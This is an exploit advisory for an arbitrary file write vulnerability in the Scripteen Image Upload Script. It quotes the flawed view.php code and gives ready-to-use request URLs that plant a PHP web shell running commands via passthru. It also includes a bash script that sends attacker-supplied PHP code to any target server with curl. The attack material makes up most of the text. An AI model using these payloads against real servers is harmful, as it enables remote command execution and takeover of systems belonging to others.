Scripteen İmage Upload Script - Arbitrary File Injection

2019.10.23

Credit: z3r0fy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection
[+] Venedor Home Page : https://scripteen.com/
[+] Author : z3r0fy
[+] Twitter : z3r0fy
[+] Website : www.bugcontainer.gq
[+] Description :
Due to these codes in the View.php file
$home = fopen($_GET["file"], "w"); fwrite($home, $_GET["data"]);
File can be written arbitrarily
Exploit : /app/view.php?file=shell.php&data=<?php phpinfo();?>
If you want to be made more offensive,
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>
After poc is applied, This way the command can be run on the server "shell.php?cmd=" ​​
[+] PoC :
#!/bin/bash
echo "
__________ ____ ___ _______ __
|__ /___ /| _ \ / _ \| ___\ \ / /
/ / |_ \| |_) | | | | |_ \ V /
/ /_ ___) | _ <| |_| | _| | |
/____|____/|_| \_\\___/|_| |_|
"
echo" "
echo -n "[+] TARGET : " ;read hedef
echo -n "[+] PHP Code : " ;read kod
curl $hedef/app/view.php?file=shell.php&data=$kod

References:

http://bugcontainer.gq/kutuphane/scripteen-arbitrary-file-injection.txt

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Scripteen İmage Upload Script - Arbitrary File Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.